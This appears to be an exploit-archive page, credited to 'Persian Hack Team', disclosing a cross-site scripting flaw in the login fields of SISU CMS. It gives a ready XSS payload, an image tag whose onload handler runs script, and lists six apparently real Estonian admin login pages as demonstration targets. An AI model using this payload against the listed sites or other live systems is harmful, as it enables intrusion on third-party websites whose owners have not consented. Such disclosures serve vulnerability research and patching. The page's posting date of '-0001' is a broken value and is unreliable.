Home / os / winme

SISU CMS - Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>SISU CMS - Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : SISU CMS - Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.laborint.com/ # Category: [ Webapps ] # Tested on: [ Win ] # Date: 2016/05/26 ###################### # # PoC: # username and password Box vulnerable To XSS # Payload = <img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg" onload="alert('XSS')"</img> # Demo : # http://www.muuseum.ee/admin/ # http://www.etdm.ee/admin/ # http://www.dormitorium.ee/admin/ # http://www.meredivisjon.ee/admin/ # http://www.trt.ee/admin/ # http://www.thky.ee/admin/ # ###################### # Discovered by : # Mojtaba MobhaM & T3NZOG4N & FireKernel # Greetz : Milad Hacking And All Persian Hack Team Members # Homepage : persian-team.ir ###################### </BODY></HTML>

 

TOP